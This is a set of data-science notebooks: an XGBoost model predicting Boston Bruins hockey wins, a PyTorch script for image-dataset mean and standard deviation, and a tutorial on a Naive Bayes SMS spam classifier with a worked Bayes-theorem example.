dataset = X_val,
model_features = X_val.columns,
feature = feature
)
pdp_plot(pdp_faceoffs, feature_name=feature, plot_lines=True, frac_to_plot=100);
# + id="Al9ZMa8GVHU6" colab_type="code" outputId="030cd2c9-1a57-4053-8276-d88c4ae7b4e4" colab={"base_uri": "https://localhost:8080/", "height": 577}
feature='shots'
pdp_shots = pdp_isolate(
model = pipeline_xgb,
dataset = X_val,
model_features = X_val.columns,
feature = feature
)
pdp_plot(pdp_shots, feature_name=feature, plot_lines=True, frac_to_plot=100);
# + id="0o-_dq01EcqX" colab_type="code" outputId="c5cab31d-c9c1-4b08-99dd-5b679510c9e6" colab={"base_uri": "https://localhost:8080/", "height": 598}
#PDP two features
from pdpbox.pdp import pdp_interact, pdp_interact_plot
features=['hits','shots']
interaction = pdp_interact(
model=pipeline_xgb,
dataset=X_val,
model_features=X_val.columns,
features=features
)
pdp_interact_plot(interaction, plot_type='grid', feature_names=features);
# + [markdown] id="7tyL961uVQ3j" colab_type="text"
# #ROC/AUC Score
# + id="1oC4wXczDnTL" colab_type="code" outputId="78897994-6b33-48ca-d275-b753d7c77e42" colab={"base_uri": "https://localhost:8080/", "height": 710}
#for ROC/AUC from class..
processor = make_pipeline(
ce.OrdinalEncoder(),
SimpleImputer(strategy='median')
)
X_train_processed = processor.fit_transform(X_train)
X_val_processed = processor.transform(X_val)
eval_set = [(X_train_processed, y_train),
(X_val_processed, y_val)]
model = XGBClassifier(n_estimators=1000, n_jobs=-1)
model.fit(X_train_processed, y_train, eval_set=eval_set, eval_metric='auc',
early_stopping_rounds=10)
# + id="ygL6o89eDwNC" colab_type="code" outputId="63a36988-96c8-4ef0-eeeb-a5d002297aaf" colab={"base_uri": "https://localhost:8080/", "height": 52}
from sklearn.metrics import roc_auc_score
X_test_proc = processor.transform(X_test)
class_index = 1
y_pred_proba = model.predict_proba(X_test_proc)[:, class_index]
print(f'Test ROC AUC for class {class_index}:')
print(roc_auc_score(y_test, y_pred_proba))
# + id="i-rCgr3sD1u4" colab_type="code" outputId="6d9dfa3e-dcca-49db-9818-8976871a8d5d" colab={"base_uri": "https://localhost:8080/", "height": 1000}
#ROC/AUC
from sklearn.metrics import roc_curve
# Probability for last class
y_pred_proba = pipeline_xgb.predict_proba(X_val)[:, -1]
fpr, tpr, thresholds = roc_curve(y_val, y_pred_proba)
#data frame
pd.DataFrame({
'False Positive Rate': fpr,
'True Positive Rate': tpr,
'Threshold': thresholds
})
# + id="hwEUGmZOD6DT" colab_type="code" outputId="52626d0a-5d22-4123-fde7-fced363ecc51" colab={"base_uri": "https://localhost:8080/", "height": 294}
plt.plot(fpr, tpr)
plt.title('ROC curve (goals included)')
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate');
# + id="uMp5oUnd83VK" colab_type="code" outputId="c0147876-5ee5-4e46-93f1-c238739a53fe" colab={"base_uri": "https://localhost:8080/", "height": 212}
#shap #1
import shap
row = X_test.iloc[[60]]
explainer=shap.TreeExplainer(model)
row_processed = processor.transform(row)
shap_values = explainer.shap_values(row_processed)
shap.initjs()
shap.force_plot(
base_value=explainer.expected_value,
shap_values=shap_values,
features=row,
link='logit'
)
# + id="fVVRc28Kwetr" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 70} outputId="67f9e00a-314a-474c-d92e-9b40c0b85504"
#confusion matrix
from sklearn.metrics import confusion_matrix
from sklearn.utils.multiclass import unique_labels
print(confusion_matrix(y_test, y_pred_xgb))
print(unique_labels(y_test))
# + id="vqOFI9vewL_5" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 264} outputId="ac501ad6-4efd-415f-859c-5ce8779ca301"
import seaborn as sns
def plot_confusion_matrix(y_true, y_pred):
labels = unique_labels(y_true)
columns = [f'Predicted {label}' for label in labels]
index = [f'Actual {label}' for label in labels]
df = pd.DataFrame(confusion_matrix(y_true, y_pred),
columns = columns,
index = index)
return sns.heatmap(df, annot=True, fmt='d', cmap='Blues')
plot_confusion_matrix(y_test, y_pred_xgb);
# + [markdown] id="xMH3_BNiP96u" colab_type="text"
# #Dash App Interface
# + id="PDnV7dGw_IHj" colab_type="code" outputId="9dc16553-2a36-448a-8882-8ca4ff7cd94c" colab={"base_uri": "https://localhost:8080/", "height": 33}
import joblib
from joblib import dump
dump(pipeline_xgb, 'pipeline_xgb.joblib', compress=True)
# + id="udLLqhzgbkLw" colab_type="code" colab={}
from google.colab import files
files.download('pipeline_xgb.joblib')
# + id="0eDe-TtdixBX" colab_type="code" outputId="a768ce4e-f721-47a4-b356-8af23a76cada" colab={"base_uri": "https://localhost:8080/", "height": 197}
X_train.head()
# + id="8pBKs7IaiYk4" colab_type="code" colab={}
def predict(goals, shots, hits, pim, powerPlayOpportunities, faceOffWinPercentage, giveaways, takeaways, game_type, HoA):
df_dash = pd.DataFrame(
columns=['goals', 'shots', 'hits', 'pim', 'powerPlayOpportunities', 'faceOffWinPercentage','giveaways', 'takeaways','game_type','HoA'],
data=[[goals, shots, hits, pim, powerPlayOpportunities, faceOffWinPercentage, giveaways, takeaways, game_type, HoA]]
)
y_pred = pipeline_xgb.predict_proba(df_dash)[:,1]
return f'{y_pred}'
# + id="tJLJ2UV6j77O" colab_type="code" outputId="1c5958c5-17bf-48b7-ec85-89b0f724c131" colab={"base_uri": "https://localhost:8080/", "height": 34}
predict(4, 21, 29, 4, 1, 52.7, 8, 8, 2, 'away')
# + id="FN3VPNBiYgew" colab_type="code" outputId="9c931be2-8a8e-4256-e1c8-e2e128e0013e" colab={"base_uri": "https://localhost:8080/", "height": 217}
df_10_11 = df_10_11[bruins_id_condition]
df_10_11 = df_10_11.sort_values(by=['game_number'])
df_10_11.tail()
# + [markdown] id="CqUTZQGHwFjM" colab_type="text"
# # Stanley Cup Case Study
# + id="CZgogNTYbONh" colab_type="code" outputId="57ad550f-85de-494a-f835-49409c62a4a6" colab={"base_uri": "https://localhost:8080/", "height": 817}
#predicting on 2010-2011 stanley cup playoffs last game
#pass in conditionals
condition = ((df['game_type'] == 3) & (df['season'] == 2010) & (df['head_coach'] == '<NAME>'))
df_stanley_cup = df[condition]
#sort by game id to ensure order is correct
df_stanley_cup = df_stanley_cup.sort_values('game_number')
df_stanley_cup
# + id="j23yYixygRe6" colab_type="code" outputId="5c2e1461-c3a6-4b11-e420-f01a7088b2f8" colab={"base_uri": "https://localhost:8080/", "height": 787}
#dropping last game to summarize the numerical data and run through prediction
df_stanley_cup = df_stanley_cup.drop([304])
df_stanley_cup
# + id="LJUwWcauV-sj" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 301} outputId="a4e05563-df75-451a-b1d7-6ad50059951c"
df_stanley_cup.mean()
# + id="pSkkrAtjg2Kg" colab_type="code" outputId="c85039f6-e768-44e9-9a66-0dc153b55094" colab={"base_uri": "https://localhost:8080/", "height": 34}
#model predicted with 54% probability
#that the Bruins would win the Stanley Cup game based off of playoff averages!!!
#awesome
predict(3.2, 32.4, 26.8, 16.3, 3.6, 52.1, 8.2, 5.3, 3, 'away')
# + id="OcgGz3RWj0a5" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 797} outputId="2b3baddf-82de-40c5-b323-17cac8d7f5b8"
#pass in conditionals
condition = ((df['game_type'] == 3) & (df['season'] == 2010) & (df['head_coach'] == '<NAME>'))
df_stanley_cup_og = df[condition]
#sort by game id to ensure order is correct
df_stanley_cup_og = df_stanley_cup_og.sort_values('game_id')
#drop same columns to get matching data frame
df_stanley_cup_og = df_stanley_cup_og.drop(columns=['won', 'team_id', 'game_id', 'powerPlayGoals', 'game_number', 'settled_in', 'head_coach', 'season'])
df_stanley_cup_og
# + [markdown] id="HTJ99Fpr9w90" colab_type="text"
# # Boston Bruins Live!
# + id="zOLeJjb19wbw" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 887} outputId="eb167266-3f76-4e61-8c65-00f82f1da41a"
#get latest stats on the current season here:
#https://statsapi.web.nhl.com/api/v1/teams/6/stats
#feed into model, and enjoy!
import pandas as pd
current = {"stat" : {
"gamesPlayed" : 44,
"wins" : 25,
"losses" : 8,
"ot" : 11,
"pts" : 61,
"ptPctg" : "69.3",
"goalsPerGame" : 3.318,
"goalsAgainstPerGame" : 2.432,
"evGGARatio" : 1.3235,
"powerPlayPercentage" : "27.5",
"powerPlayGoals" : 39.0,
"powerPlayGoalsAgainst" : 20.0,
"powerPlayOpportunities" : 142.0,
"penaltyKillPercentage" : "85.0",
"shotsPerGame" : 31.1591,
"shotsAllowed" : 31.0227,
"winScoreFirst" : 0.581,
"winOppScoreFirst" : 0.538,
"winLeadFirstPer" : 0.727,
"winLeadSecondPer" : 0.75,
"winOutshootOpp" : 0.522,
"winOutshotByOpp" : 0.632,
"faceOffsTaken" : 2500.0,
"faceOffsWon" : 1270.0,
"faceOffsLost" : 1230.0,
"faceOffWinPercentage" : "50.8",
"shootingPctg" : 10.6,
"savePctg" : 0.922
}}
#data = {'col_1': [3, 2, 1, 0], 'col_2': ['a', 'b', 'c', 'd']}
current = pd.DataFrame.from_dict(current)
current
|
NHL_Data_Project_Team_Stats.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + _uuid="8f2839f25d086af736a60e9eeb907d3b93b6e0e5" _cell_guid="b1076dfc-b9ad-4769-8c92-a6c4dae69d19"
from torchvision.datasets import ImageFolder
from torch.utils.data import TensorDataset, DataLoader
from torchvision.transforms import ToTensor
def cal_mean_std(data_loader):
my_mean = 0.
my_std = 0.
nb_samples = 0.
for data,_ in data_loader:
batch_samples = data.shape[0]
data = data.view(batch_samples, data.shape[1], -1)
my_mean += data.mean(2).sum(0)
my_std += data.std(2).sum(0)
nb_samples += batch_samples
my_mean /= nb_samples
my_std /= nb_samples
return my_mean,my_std
train_directory = "../input/acse-miniproject/train"
batch_size = 64
my_data = ImageFolder(train_directory, transform=ToTensor())
train_loader = DataLoader(my_data, batch_size=batch_size, shuffle=True, num_workers=0)
means, stds = cal_mean_std(train_loader)
print("Means of our training set: ", means, "\nStds of our training set: ", stds)
# + _uuid="d629ff2d2480ee46fbb7e2d37f6b5fab8052498a" _cell_guid="79c7e3d0-c299-4dcb-8224-4455121ee9b0"
|
PoissoNet/Mean and std finder.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Our Mission ##
#
# Spam detection is one of the major applications of Machine Learning in the interwebs today. Pretty much all of the major email service providers have spam detection systems built in and automatically classify such mail as 'Junk Mail'.
#
# In this mission we will be using the Naive Bayes algorithm to create a model that can classify [dataset](https://archive.ics.uci.edu/ml/datasets/SMS+Spam+Collection) SMS messages as spam or not spam, based on the training we give to the model. It is important to have some level of intuition as to what a spammy text message might look like. Usually they have words like 'free', 'win', 'winner', 'cash', 'prize' and the like in them as these texts are designed to catch your eye and in some sense tempt you to open them. Also, spam messages tend to have words written in all capitals and also tend to use a lot of exclamation marks. To the recipient, it is usually pretty straightforward to identify a spam text and our objective here is to train a model to do that for us!
#
# Being able to identify spam messages is a binary classification problem as messages are classified as either 'Spam' or 'Not Spam' and nothing else. Also, this is a supervised learning problem, as we will be feeding a labelled dataset into the model, that it can learn from, to make future predictions.
# ### Step 0: Introduction to the Naive Bayes Theorem ###
#
# Bayes theorem is one of the earliest probabilistic inference algorithms developed by Reverend Bayes (which he used to try and infer the existence of God no less) and still performs extremely well for certain use cases.
#
# It's best to understand this theorem using an example. Let's say you are a member of the Secret Service and you have been deployed to protect the Democratic presidential nominee during one of his/her campaign speeches. Being a public event that is open to all, your job is not easy and you have to be on the constant lookout for threats. So one place to start is to put a certain threat-factor for each person. So based on the features of an individual, like the age, sex, and other smaller factors like is the person carrying a bag?, does the person look nervous? etc. you can make a judgement call as to if that person is viable threat.
#
# If an individual ticks all the boxes up to a level where it crosses a threshold of doubt in your mind, you can take action and remove that person from the vicinity. The Bayes theorem works in the same way as we are computing the probability of an event(a person being a threat) based on the probabilities of certain related events(age, sex, presence of bag or not, nervousness etc. of the person).
#
# One thing to consider is the independence of these features amongst each other. For example if a child looks nervous at the event then the likelihood of that person being a threat is not as much as say if it was a grown man who was nervous. To break this down a bit further, here there are two features we are considering, age AND nervousness. Say we look at these features individually, we could design a model that flags ALL persons that are nervous as potential threats. However, it is likely that we will have a lot of false positives as there is a strong chance that minors present at the event will be nervous. Hence by considering the age of a person along with the 'nervousness' feature we would definitely get a more accurate result as to who are potential threats and who aren't.
#
# This is the 'Naive' bit of the theorem where it considers each feature to be independant of each other which may not always be the case and hence that can affect the final judgement.
#
# In short, the Bayes theorem calculates the probability of a certain event happening(in our case, a message being spam) based on the joint probabilistic distributions of certain other events(in our case, a message being classified as spam). We will dive into the workings of the Bayes theorem later in the mission, but first, let us understand the data we are going to work with.
# ### Step 1.1: Understanding our dataset ###
#
#
# We will be using a dataset originally compiled and posted on the UCI Machine Learning repository which has a very good collection of datasets for experimental research purposes. If you're interested, you can review the [abstract](https://archive.ics.uci.edu/ml/datasets/SMS+Spam+Collection) and the original [compressed data file](https://archive.ics.uci.edu/ml/machine-learning-databases/00228/) on the UCI site. For this exercise, however, we've gone ahead and downloaded the data for you.
#
# ** Here's a preview of the data: **
#
# <img src="images/dqnb.png" height="1242" width="1242">
#
# The columns in the data set are currently not named and as you can see, there are 2 columns.
#
# The first column takes two values, 'ham' which signifies that the message is not spam, and 'spam' which signifies that the message is spam.
#
# The second column is the text content of the SMS message that is being classified.
# >** Instructions: **
# * Import the dataset into a pandas dataframe using the read_table method. The file has already been downloaded, and you can access it using the filepath 'smsspamcollection/SMSSpamCollection'. Because this is a tab separated dataset we will be using '\t' as the value for the 'sep' argument which specifies this format.
# * Also, rename the column names by specifying a list ['label, 'sms_message'] to the 'names' argument of read_table().
# * Print the first five values of the dataframe with the new column names.
# +
'''
Solution
'''
import pandas as pd
# Dataset available using filepath 'smsspamcollection/SMSSpamCollection'
df = pd.read_table('smsspamcollection/SMSSpamCollection',
sep='\t',
header=None,
names=['label', 'sms_message'])
# Output printing out first 5 columns
df.head()
# -
# ### Step 1.2: Data Preprocessing ###
#
# Now that we have a basic understanding of what our dataset looks like, lets convert our labels to binary variables, 0 to represent 'ham'(i.e. not spam) and 1 to represent 'spam' for ease of computation.
#
# You might be wondering why do we need to do this step? The answer to this lies in how scikit-learn handles inputs. Scikit-learn only deals with numerical values and hence if we were to leave our label values as strings, scikit-learn would do the conversion internally(more specifically, the string labels will be cast to unknown float values).
#
# Our model would still be able to make predictions if we left our labels as strings but we could have issues later when calculating performance metrics, for example when calculating our precision and recall scores. Hence, to avoid unexpected 'gotchas' later, it is good practice to have our categorical values be fed into our model as integers.
# >**Instructions: **
# * Convert the values in the 'label' colum to numerical values using map method as follows:
# {'ham':0, 'spam':1} This maps the 'ham' value to 0 and the 'spam' value to 1.
# * Also, to get an idea of the size of the dataset we are dealing with, print out number of rows and columns using
# 'shape'.
'''
Solution
'''
df['label'] = df.label.map({'ham':0, 'spam':1})
print(df.shape)
df.head() # returns (rows, columns)
# ### Step 2.1: Bag of words ###
#
# What we have here in our data set is a large collection of text data (5,572 rows of data). Most ML algorithms rely on numerical data to be fed into them as input, and email/sms messages are usually text heavy.
#
# Here we'd like to introduce the Bag of Words(BoW) concept which is a term used to specify the problems that have a 'bag of words' or a collection of text data that needs to be worked with. The basic idea of BoW is to take a piece of text and count the frequency of the words in that text. It is important to note that the BoW concept treats each word individually and the order in which the words occur does not matter.
#
# Using a process which we will go through now, we can covert a collection of documents to a matrix, with each document being a row and each word(token) being the column, and the corresponding (row,column) values being the frequency of occurrance of each word or token in that document.
#
# For example:
#
# Lets say we have 4 documents as follows:
#
# `['Hello, how are you!',
# 'Win money, win from home.',
# 'Call me now',
# 'Hello, Call you tomorrow?']`
#
# Our objective here is to convert this set of text to a frequency distribution matrix, as follows:
#
# <img src="images/countvectorizer.png" height="542" width="542">
#
# Here as we can see, the documents are numbered in the rows, and each word is a column name, with the corresponding value being the frequency of that word in the document.
#
# Lets break this down and see how we can do this conversion using a small set of documents.
#
# To handle this, we will be using sklearns
# [count vectorizer](http://scikit-learn.org/stable/modules/generated/sklearn.feature_extraction.text.CountVectorizer.html#sklearn.feature_extraction.text.CountVectorizer) method which does the following:
#
# * It tokenizes the string(separates the string into individual words) and gives an integer ID to each token.
# * It counts the occurrance of each of those tokens.
#
# ** Please Note: **
#
# * The CountVectorizer method automatically converts all tokenized words to their lower case form so that it does not treat words like 'He' and 'he' differently. It does this using the `lowercase` parameter which is by default set to `True`.
#
# * It also ignores all punctuation so that words followed by a punctuation mark (for example: 'hello!') are not treated differently than the same words not prefixed or suffixed by a punctuation mark (for example: 'hello'). It does this using the `token_pattern` parameter which has a default regular expression which selects tokens of 2 or more alphanumeric characters.
#
# * The third parameter to take note of is the `stop_words` parameter. Stop words refer to the most commonly used words in a language. They include words like 'am', 'an', 'and', 'the' etc. By setting this parameter value to `english`, CountVectorizer will automatically ignore all words(from our input text) that are found in the built in list of english stop words in scikit-learn. This is extremely helpful as stop words can skew our calculations when we are trying to find certain key words that are indicative of spam.
#
# We will dive into the application of each of these into our model in a later step, but for now it is important to be aware of such preprocessing techniques available to us when dealing with textual data.
# ### Step 2.2: Implementing Bag of Words from scratch ###
#
# Before we dive into scikit-learn's Bag of Words(BoW) library to do the dirty work for us, let's implement it ourselves first so that we can understand what's happening behind the scenes.
#
# ** Step 1: Convert all strings to their lower case form. **
#
# Let's say we have a document set:
#
# ```
# documents = ['Hello, how are you!',
# 'Win money, win from home.',
# 'Call me now.',
# 'Hello, Call hello you tomorrow?']
# ```
# >>** Instructions: **
# * Convert all the strings in the documents set to their lower case. Save them into a list called 'lower_case_documents'. You can convert strings to their lower case in python by using the lower() method.
#
# +
'''
Solution:
'''
documents = ['Hello, how are you!',
'Win money, win from home.',
'Call me now.',
'Hello, Call hello you tomorrow?']
lower_case_documents = []
for i in documents:
lower_case_documents.append(i.lower())
print(lower_case_documents)
# -
# ** Step 2: Removing all punctuations **
#
# >>**Instructions: **
# Remove all punctuation from the strings in the document set. Save them into a list called
# 'sans_punctuation_documents'.
# +
'''
Solution:
'''
sans_punctuation_documents = []
import string
for i in lower_case_documents:
sans_punctuation_documents.append(i.translate(str.maketrans('', '', string.punctuation)))
print(sans_punctuation_documents)
# -
# ** Step 3: Tokenization **
#
# Tokenizing a sentence in a document set means splitting up a sentence into individual words using a delimiter. The delimiter specifies what character we will use to identify the beginning and the end of a word(for example we could use a single space as the delimiter for identifying words in our document set.)
# >>**Instructions:**
# Tokenize the strings stored in 'sans_punctuation_documents' using the split() method. and store the final document set
# in a list called 'preprocessed_documents'.
#
'''
Solution:
'''
preprocessed_documents = []
for i in sans_punctuation_documents:
preprocessed_documents.append(i.split(' '))
print(preprocessed_documents)
# ** Step 4: Count frequencies **
#
# Now that we have our document set in the required format, we can proceed to counting the occurrence of each word in each document of the document set. We will use the `Counter` method from the Python `collections` library for this purpose.
#
# `Counter` counts the occurrence of each item in the list and returns a dictionary with the key as the item being counted and the corresponding value being the count of that item in the list.
# >>**Instructions:**
# Using the Counter() method and preprocessed_documents as the input, create a dictionary with the keys being each word in each document and the corresponding values being the frequncy of occurrence of that word. Save each Counter dictionary as an item in a list called 'frequency_list'.
#
# +
'''
Solution
'''
frequency_list = []
import pprint
from collections import Counter
for i in preprocessed_documents:
frequency_counts = Counter(i)
frequency_list.append(frequency_counts)
pprint.pprint(frequency_list)
# -
# Congratulations! You have implemented the Bag of Words process from scratch! As we can see in our previous output, we have a frequency distribution dictionary which gives a clear view of the text that we are dealing with.
#
# We should now have a solid understanding of what is happening behind the scenes in the `sklearn.feature_extraction.text.CountVectorizer` method of scikit-learn.
#
# We will now implement `sklearn.feature_extraction.text.CountVectorizer` method in the next step.
# ### Step 2.3: Implementing Bag of Words in scikit-learn ###
#
# Now that we have implemented the BoW concept from scratch, let's go ahead and use scikit-learn to do this process in a clean and succinct way. We will use the same document set as we used in the previous step.
'''
Here we will look to create a frequency matrix on a smaller document set to make sure we understand how the
document-term matrix generation happens. We have created a sample document set 'documents'.
'''
documents = ['Hello, how are you!',
'Win money, win from home.',
'Call me now.',
'Hello, Call hello you tomorrow?']
# >>**Instructions:**
# Import the sklearn.feature_extraction.text.CountVectorizer method and create an instance of it called 'count_vector'.
'''
Solution
'''
from sklearn.feature_extraction.text import CountVectorizer
count_vector = CountVectorizer()
# ** Data preprocessing with CountVectorizer() **
#
# In Step 2.2, we implemented a version of the CountVectorizer() method from scratch that entailed cleaning our data first. This cleaning involved converting all of our data to lower case and removing all punctuation marks. CountVectorizer() has certain parameters which take care of these steps for us. They are:
#
# * `lowercase = True`
#
# The `lowercase` parameter has a default value of `True` which converts all of our text to its lower case form.
#
#
# * `token_pattern = (?u)\\b\\w\\w+\\b`
#
# The `token_pattern` parameter has a default regular expression value of `(?u)\\b\\w\\w+\\b` which ignores all punctuation marks and treats them as delimiters, while accepting alphanumeric strings of length greater than or equal to 2, as individual tokens or words.
#
#
# * `stop_words`
#
# The `stop_words` parameter, if set to `english` will remove all words from our document set that match a list of English stop words which is defined in scikit-learn. Considering the size of our dataset and the fact that we are dealing with SMS messages and not larger text sources like e-mail, we will not be setting this parameter value.
#
# You can take a look at all the parameter values of your `count_vector` object by simply printing out the object as follows:
'''
Practice node:
Print the 'count_vector' object which is an instance of 'CountVectorizer()'
'''
print(count_vector)
# >>**Instructions:**
# Fit your document dataset to the CountVectorizer object you have created using fit(), and get the list of words
# which have been categorized as features using the get_feature_names() method.
'''
Solution:
'''
count_vector.fit(documents)
count_vector.get_feature_names()
# The `get_feature_names()` method returns our feature names for this dataset, which is the set of words that make up our vocabulary for 'documents'.
# >>**
# Instructions:**
# Create a matrix with the rows being each of the 4 documents, and the columns being each word.
# The corresponding (row, column) value is the frequency of occurrance of that word(in the column) in a particular
# document(in the row). You can do this using the transform() method and passing in the document data set as the
# argument. The transform() method returns a matrix of numpy integers, you can convert this to an array using
# toarray(). Call the array 'doc_array'
#
'''
Solution
'''
doc_array = count_vector.transform(documents).toarray()
doc_array
# Now we have a clean representation of the documents in terms of the frequency distribution of the words in them. To make it easier to understand our next step is to convert this array into a dataframe and name the columns appropriately.
# >>**Instructions:**
# Convert the array we obtained, loaded into 'doc_array', into a dataframe and set the column names to
# the word names(which you computed earlier using get_feature_names(). Call the dataframe 'frequency_matrix'.
#
'''
Solution
'''
frequency_matrix = pd.DataFrame(doc_array,
columns = count_vector.get_feature_names())
frequency_matrix
# Congratulations! You have successfully implemented a Bag of Words problem for a document dataset that we created.
#
# One potential issue that can arise from using this method out of the box is the fact that if our dataset of text is extremely large(say if we have a large collection of news articles or email data), there will be certain values that are more common that others simply due to the structure of the language itself. So for example words like 'is', 'the', 'an', pronouns, grammatical contructs etc could skew our matrix and affect our analyis.
#
# There are a couple of ways to mitigate this. One way is to use the `stop_words` parameter and set its value to `english`. This will automatically ignore all words(from our input text) that are found in a built in list of English stop words in scikit-learn.
#
# Another way of mitigating this is by using the [tfidf](http://scikit-learn.org/stable/modules/generated/sklearn.feature_extraction.text.TfidfVectorizer.html#sklearn.feature_extraction.text.TfidfVectorizer) method. This method is out of scope for the context of this lesson.
# ### Step 3.1: Training and testing sets ###
#
# Now that we have understood how to deal with the Bag of Words problem we can get back to our dataset and proceed with our analysis. Our first step in this regard would be to split our dataset into a training and testing set so we can test our model later.
#
# >>**Instructions:**
# Split the dataset into a training and testing set by using the train_test_split method in sklearn. Split the data
# using the following variables:
# * `X_train` is our training data for the 'sms_message' column.
# * `y_train` is our training data for the 'label' column
# * `X_test` is our testing data for the 'sms_message' column.
# * `y_test` is our testing data for the 'label' column
# Print out the number of rows we have in each our training and testing data.
#
# +
'''
Solution
NOTE: sklearn.cross_validation will be deprecated soon to sklearn.model_selection
'''
# split into training and testing sets
# USE from sklearn.model_selection import train_test_split to avoid seeing deprecation warning.
from sklearn.cross_validation import train_test_split
X_train, X_test, y_train, y_test = train_test_split(df['sms_message'],
df['label'],
random_state=1)
print('Number of rows in the total set: {}'.format(df.shape[0]))
print('Number of rows in the training set: {}'.format(X_train.shape[0]))
print('Number of rows in the test set: {}'.format(X_test.shape[0]))
# -
# ### Step 3.2: Applying Bag of Words processing to our dataset. ###
#
# Now that we have split the data, our next objective is to follow the steps from Step 2: Bag of words and convert our data into the desired matrix format. To do this we will be using CountVectorizer() as we did before. There are two steps to consider here:
#
# * Firstly, we have to fit our training data (`X_train`) into `CountVectorizer()` and return the matrix.
# * Secondly, we have to transform our testing data (`X_test`) to return the matrix.
#
# Note that `X_train` is our training data for the 'sms_message' column in our dataset and we will be using this to train our model.
#
# `X_test` is our testing data for the 'sms_message' column and this is the data we will be using(after transformation to a matrix) to make predictions on. We will then compare those predictions with `y_test` in a later step.
#
# For now, we have provided the code that does the matrix transformations for you!
'''
[Practice Node]
The code for this segment is in 2 parts. Firstly, we are learning a vocabulary dictionary for the training data
and then transforming the data into a document-term matrix; secondly, for the testing data we are only
transforming the data into a document-term matrix.
This is similar to the process we followed in Step 2.3
We will provide the transformed data to students in the variables 'training_data' and 'testing_data'.
'''
# +
'''
Solution
'''
# Instantiate the CountVectorizer method
count_vector = CountVectorizer()
# Fit the training data and then return the matrix
training_data = count_vector.fit_transform(X_train)
# Transform testing data and return the matrix. Note we are not fitting the testing data into the CountVectorizer()
testing_data = count_vector.transform(X_test)
# -
# ### Step 4.1: Bayes Theorem implementation from scratch ###
#
# Now that we have our dataset in the format that we need, we can move onto the next portion of our mission which is the algorithm we will use to make our predictions to classify a message as spam or not spam. Remember that at the start of the mission we briefly discussed the Bayes theorem but now we shall go into a little more detail. In layman's terms, the Bayes theorem calculates the probability of an event occurring, based on certain other probabilities that are related to the event in question. It is composed of a prior(the probabilities that we are aware of or that is given to us) and the posterior(the probabilities we are looking to compute using the priors).
#
# Let us implement the Bayes Theorem from scratch using a simple example. Let's say we are trying to find the odds of an individual having diabetes, given that he or she was tested for it and got a positive result.
# In the medical field, such probabilies play a very important role as it usually deals with life and death situatuations.
#
# We assume the following:
#
# `P(D)` is the probability of a person having Diabetes. It's value is `0.01` or in other words, 1% of the general population has diabetes(Disclaimer: these values are assumptions and are not reflective of any medical study).
#
# `P(Pos)` is the probability of getting a positive test result.
#
# `P(Neg)` is the probability of getting a negative test result.
#
# `P(Pos|D)` is the probability of getting a positive result on a test done for detecting diabetes, given that you have diabetes. This has a value `0.9`. In other words the test is correct 90% of the time. This is also called the Sensitivity or True Positive Rate.
#
# `P(Neg|~D)` is the probability of getting a negative result on a test done for detecting diabetes, given that you do not have diabetes. This also has a value of `0.9` and is therefore correct, 90% of the time. This is also called the Specificity or True Negative Rate.
#
# The Bayes formula is as follows:
#
# <img src="images/bayes_formula.png" height="242" width="242">
#
# * `P(A)` is the prior probability of A occuring independantly. In our example this is `P(D)`. This value is given to us.
#
# * `P(B)` is the prior probability of B occuring independantly. In our example this is `P(Pos)`.
#
# * `P(A|B)` is the posterior probability that A occurs given B. In our example this is `P(D|Pos)`. That is, **the probability of an individual having diabetes, given that, that individual got a positive test result. This is the value that we are looking to calculate.**
#
# * `P(B|A)` is the likelihood probability of B occuring, given A. In our example this is `P(Pos|D)`. This value is given to us.
# Putting our values into the formula for Bayes theorem we get:
#
# `P(D|Pos) = (P(D) * P(Pos|D) / P(Pos)`
#
# The probability of getting a positive test result `P(Pos)` can be calulated using the Sensitivity and Specificity as follows:
#
# `P(Pos) = [P(D) * Sensitivity] + [P(~D) * (1-Specificity))]`
'''
Instructions:
Calculate probability of getting a positive test result, P(Pos)
'''
# +
'''
Solution (skeleton code will be provided)
'''
# P(D)
p_diabetes = 0.01
# P(~D)
p_no_diabetes = 0.99
# Sensitivity or P(Pos|D)
p_pos_diabetes = 0.9
# Specificity or P(Neg/~D)
p_neg_no_diabetes = 0.9
# P(Pos)
p_pos = (p_diabetes * p_pos_diabetes) + (p_no_diabetes * (1 - p_neg_no_diabetes))
print('The probability of getting a positive test result P(Pos) is: {}',format(p_pos))
# -
# ** Using all of this information we can calculate our posteriors as follows: **
#
# The probability of an individual having diabetes, given that, that individual got a positive test result:
#
# `P(D/Pos) = (P(D) * Sensitivity)) / P(Pos)`
#
# The probability of an individual not having diabetes, given that, that individual got a positive test result:
#
# `P(~D/Pos) = (P(~D) * (1-Specificity)) / P(Pos)`
#
# The sum of our posteriors will always equal `1`.
'''
Instructions:
Compute the probability of an individual having diabetes, given that, that individual got a positive test result.
In other words, compute P(D|Pos).
The formula is: P(D|Pos) = (P(D) * P(Pos|D) / P(Pos)
'''
'''
Solution
'''
# P(D|Pos)
p_diabetes_pos = (p_diabetes * p_pos_diabetes) / p_pos
print('Probability of an individual having diabetes, given that that individual got a positive test result is:\
',format(p_diabetes_pos))
'''
Instructions:
Compute the probability of an individual not having diabetes, given that, that individual got a positive test result.
In other words, compute P(~D|Pos).
The formula is: P(~D|Pos) = (P(~D) * P(Pos|~D) / P(Pos)
Note that P(Pos/~D) can be computed as 1 - P(Neg/~D).
Therefore:
P(Pos/~D) = p_pos_no_diabetes = 1 - 0.9 = 0.1
'''
# +
'''
Solution
'''
# P(Pos/~D)
p_pos_no_diabetes = 0.1
# P(~D|Pos)
p_no_diabetes_pos = (p_no_diabetes * p_pos_no_diabetes) / p_pos
print 'Probability of an individual not having diabetes, given that that individual got a positive test result is:'\
,p_no_diabetes_pos
# -
# Congratulations! You have implemented Bayes theorem from scratch. Your analysis shows that even if you get a positive test result, there is only a 8.3% chance that you actually have diabetes and a 91.67% chance that you do not have diabetes. This is of course assuming that only 1% of the entire population has diabetes which of course is only an assumption.
